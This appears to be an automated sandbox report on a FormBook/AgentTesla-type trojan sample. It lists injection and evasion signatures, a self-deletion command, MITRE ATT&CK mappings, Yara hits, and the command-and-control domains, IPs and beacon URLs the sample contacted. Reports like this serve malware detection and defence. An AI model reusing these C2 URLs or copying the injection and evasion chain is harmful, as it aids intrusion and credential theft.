            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03578DF1 mov eax, dword ptr fs:[00000030h]8_2_03578DF1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DD5E0 mov eax, dword ptr fs:[00000030h]8_2_034DD5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DD5E0 mov eax, dword ptr fs:[00000030h]8_2_034DD5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FFD9B mov eax, dword ptr fs:[00000030h]8_2_034FFD9B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FFD9B mov eax, dword ptr fs:[00000030h]8_2_034FFD9B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F35A1 mov eax, dword ptr fs:[00000030h]8_2_034F35A1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035905AC mov eax, dword ptr fs:[00000030h]8_2_035905AC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035905AC mov eax, dword ptr fs:[00000030h]8_2_035905AC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F1DB5 mov eax, dword ptr fs:[00000030h]8_2_034F1DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F1DB5 mov eax, dword ptr fs:[00000030h]8_2_034F1DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F1DB5 mov eax, dword ptr fs:[00000030h]8_2_034F1DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA44B mov eax, dword ptr fs:[00000030h]8_2_034FA44B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355C450 mov eax, dword ptr fs:[00000030h]8_2_0355C450
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00409B40 LdrLoadDll,2_2_00409B40
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.sakina.digital
            Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.ninetofivetheses.com
            Source: C:\Windows\explorer.exeDomain query: www.privatelymeeting.com
            Source: C:\Windows\explorer.exeNetwork Connect: 156.225.2.209 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.agora.markets
            Source: C:\Windows\explorer.exeDomain query: www.sakuratyu.com
            Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.hartfulcleaning.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.2ed58fwec.xyz
            Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.74 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 81.88.48.71 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.qumpan.com
            Source: C:\Windows\explorer.exeDomain query: www.factechcolombia.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 830000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeMemory written: C:\Users\user\Desktop\OApfyh3Vfm.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424Jump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess created: C:\Users\user\Desktop\OApfyh3Vfm.exe C:\Users\user\Desktop\OApfyh3Vfm.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'Jump to behavior
            Source: explorer.exe, 00000003.00000000.767323654.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.678836866.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.933715263.00000000058F0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000003.00000000.687471430.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeQueries volume information: C:\Users\user\Desktop\OApfyh3Vfm.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 495803 Sample: OApfyh3Vfm Startdate: 03/10/2021 Architecture: WINDOWS Score: 100 31 www.zoonseo.com 2->31 33 www.noordinarybusiness.com 2->33 35 3 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 7 other signatures 2->49 11 OApfyh3Vfm.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\OApfyh3Vfm.exe.log, ASCII 11->29 dropped 65 Tries to detect virtualization through RDTSC time measurements 11->65 67 Injects a PE file into a foreign processes 11->67 15 OApfyh3Vfm.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 Queues an APC in another process (thread injection) 15->75 18 explorer.exe 15->18 injected process9 dnsIp10 37 sakina.digital 81.169.145.74, 49840, 80 STRATOSTRATOAGDE Germany 18->37 39 www.2ed58fwec.xyz 156.225.2.209, 49827, 80 SPEEDNETWORK-AS-APHONGKONGSPEEDNETWORKTECHNOLOGYCOL Seychelles 18->39 41 14 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 55 Uses netstat to query active network connections and open ports 18->55 22 NETSTAT.EXE 18->22         started        signatures11 process12 signatures13 57 Self deletion via cmd delete 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 Maps a DLL or memory area into another process 22->61 63 Tries to detect virtualization through RDTSC time measurements 22->63 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            OApfyh3Vfm.exe49%VirustotalBrowse
            OApfyh3Vfm.exe37%MetadefenderBrowse
            OApfyh3Vfm.exe71%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.2.OApfyh3Vfm.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            ninetofivetheses.com0%VirustotalBrowse
            www.zoonseo.com0%VirustotalBrowse
            td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko0%Avira URL Cloudsafe
            http://www.sakina.digital/shjn/?BZXds2=U4D/9jyl4LwInOaHPL1dM7FXipfOkLnA1xY1V+vBJ7elQfZSHChwpT42Icw9AFkuQMKq&jlW=5jIhet30%Avira URL Cloudsafe
            http://www.hartfulcleaning.com/shjn/?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet30%Avira URL Cloudsafe
            http://www.privatelymeeting.com/shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet30%Avira URL Cloudsafe
            http://www.2ed58fwec.xyz/shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet30%Avira URL Cloudsafe
            http://www.factechcolombia.com/shjn/?BZXds2=q+IOPKcWAF8HOZaSc4cEUEu5wE6+kd2dEtRaCxRabbawa99LvN+eX182jK5p9vZ8QaPu&jlW=5jIhet30%Avira URL Cloudsafe
            www.anamentor.com/shjn/0%Avira URL Cloudsafe
            http://www.ninetofivetheses.com/shjn/?BZXds2=DRu3/33A+HP1NRfSxdp3iuQBFZZLKD7J2S+jM/VNqTCHnWN0FA+Y+jnmu1WXSKeywE4Q&jlW=5jIhet30%Avira URL Cloudsafe
            http://www.qumpan.com/shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet30%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ninetofivetheses.com
            		34.102.136.180
            		truefalseunknown
            www.zoonseo.com
            		173.231.37.12
            		truetrueunknown
            www.modernmpm.com
            		199.59.242.153
            		truetrue
              		unknown
              td-balancer-euw2-6-109.wixdns.net
              		35.246.6.109
              		truefalseunknown
              www.privatelymeeting.com
              		213.186.33.5
              		truetrue
                		unknown
                factechcolombia.com
                		81.88.48.71
                		truetrue
                  		unknown
                  sakina.digital
                  		81.169.145.74
                  		truetrue
                    		unknown
                    www.2ed58fwec.xyz
                    		156.225.2.209
                    		truetrue
                      		unknown
                      www.qumpan.com
                      		46.38.243.234
                      		truetrue
                        		unknown
                        www.anamentor.com
                        		104.21.51.95
                        		truetrue
                          		unknown
                          www.sakina.digital
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ninetofivetheses.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.agora.markets
                              		unknown
                              		unknowntrue
                                		unknown
                                www.sakuratyu.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.hartfulcleaning.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.njhude.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.factechcolombia.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.noordinarybusiness.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.sakina.digital/shjn/?BZXds2=U4D/9jyl4LwInOaHPL1dM7FXipfOkLnA1xY1V+vBJ7elQfZSHChwpT42Icw9AFkuQMKq&jlW=5jIhet3true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hartfulcleaning.com/shjn/?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.privatelymeeting.com/shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.2ed58fwec.xyz/shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.factechcolombia.com/shjn/?BZXds2=q+IOPKcWAF8HOZaSc4cEUEu5wE6+kd2dEtRaCxRabbawa99LvN+eX182jK5p9vZ8QaPu&jlW=5jIhet3true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.anamentor.com/shjn/true
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.ninetofivetheses.com/shjn/?BZXds2=DRu3/33A+HP1NRfSxdp3iuQBFZZLKD7J2S+jM/VNqTCHnWN0FA+Y+jnmu1WXSKeywE4Q&jlW=5jIhet3false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.qumpan.com/shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet3true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOckoNETSTAT.EXE, 00000008.00000002.933459913.0000000003B52000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          213.186.33.5
                                          		www.privatelymeeting.comFrance
                                          		16276OVHFRtrue
                                          35.246.6.109
                                          		td-balancer-euw2-6-109.wixdns.netUnited States
                                          		15169GOOGLEUSfalse
                                          156.225.2.209
                                          		www.2ed58fwec.xyzSeychelles
                                          		139265SPEEDNETWORK-AS-APHONGKONGSPEEDNETWORKTECHNOLOGYCOLtrue
                                          34.102.136.180
                                          		ninetofivetheses.comUnited States
                                          		15169GOOGLEUSfalse
                                          81.169.145.74
                                          		sakina.digitalGermany
                                          		6724STRATOSTRATOAGDEtrue
                                          81.88.48.71
                                          		factechcolombia.comItaly
                                          		39729REGISTER-ASITtrue
                                          46.38.243.234
                                          		www.qumpan.comGermany
                                          		197540NETCUP-ASnetcupGmbHDEtrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:495803
                                          Start date:03.10.2021
                                          Start time:09:55:29
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 49s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:OApfyh3Vfm (renamed file extension from none to exe)
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@19/7
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 16.9% (good quality ratio 14.9%)
                                          • Quality average: 71.8%
                                          • Quality standard deviation: 32.7%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 116
                                          • Number of non-executed functions: 158
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 40.126.31.143, 40.126.31.135, 20.190.159.136, 40.126.31.6, 40.126.31.141, 40.126.31.139, 20.190.159.134, 20.190.159.132, 20.82.210.154, 95.100.218.79, 209.197.3.8, 20.50.102.62, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60
                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          09:56:29API Interceptor1x Sleep call for process: OApfyh3Vfm.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          213.186.33.5P.O Turkey_51021.exeGet hashmaliciousBrowse
                                          • www.badji-consulting.com/un3a/?7nH=/xgtpsrvNhmWseN6B+mMwD/3zlqwXFzD6Ke4Te1hFrO2JhIa3A3FpEDoKU5ARwPQSZkM&i6y=iVkD
                                          SOA.exeGet hashmaliciousBrowse
                                          • www.eu-cc-scheme-isac.com/eods/?e2M=B48tCN&0488qv=F9Ltz4hjiu0I6+j2wV/8Zk7bshxyTBv8V8Zgjkg9hKKY4Q/4fXaSPDL1y2LmX9E023W3
                                          Z14S9Zolcyub1pd.exeGet hashmaliciousBrowse
                                          • www.edgar-regale.com/jdt0/?YPyd=QpNqCCk/w5C4FJ2XvGA42+trnKyHbnMin3ffX2+aSQ3Q0hQJTWPTFDZX55IzwXmDjCim&Z8atc=2dtlDXLP5h8H2Zg0
                                          DOC.exeGet hashmaliciousBrowse
                                          • www.hotel-balzac.paris/n58i/?RFN0Kv=04fPn6sxaFNHz&Q0DL4pLH=cltUg8I60wQSNq1POnzUEQl5YYU1bxKdSkbeF3W90ZOnJRrjtJdPokcfzu1BtUzjohcR
                                          USD INV#1191189.xlsxGet hashmaliciousBrowse
                                          • www.lacageavin.com/b6cu/?n6=B6rzKVNhwWBrYBudNzJT/AwPBizW8k3hcm2KU8VARUNeylPckMLclLMptxRkmVZCwNt3mQ==&xTBXUJ=6lftpVLP0d
                                          New Order.exeGet hashmaliciousBrowse
                                          • www.lacageavin.com/b6cu/?I6Al=wTVDQbk0M6&R48=B6rzKVNkwRBvYRiRPzJT/AwPBizW8k3hcmuaI/JBV0NfyUjajcaQzP0ruXRi+0BK87ZW/sllUQ==
                                          prueba22.exeGet hashmaliciousBrowse
                                          • www.bosc.pro/a0ce/?O2Mp=p3W6tZqqMh9cyJWI+Ifxtu9b3XcFtsvySVo7/NVrh1mIcTF+GwrcSSrI+V7FI7p/2Fok5w==&cT_T=9ra0stsXZtHLPLNp
                                          Swift Copy.exeGet hashmaliciousBrowse
                                          • www.votreconseilfinancier.com/b6cu/?2dSpM=5FGFntgWmLj4vD/wcjkbKA/XjB0p23UKe5ZDLLIhgH6ngvA+ZRqv804x9gqeYQWIj44x&PVvtW=7nWhA
                                          purchase order.exeGet hashmaliciousBrowse
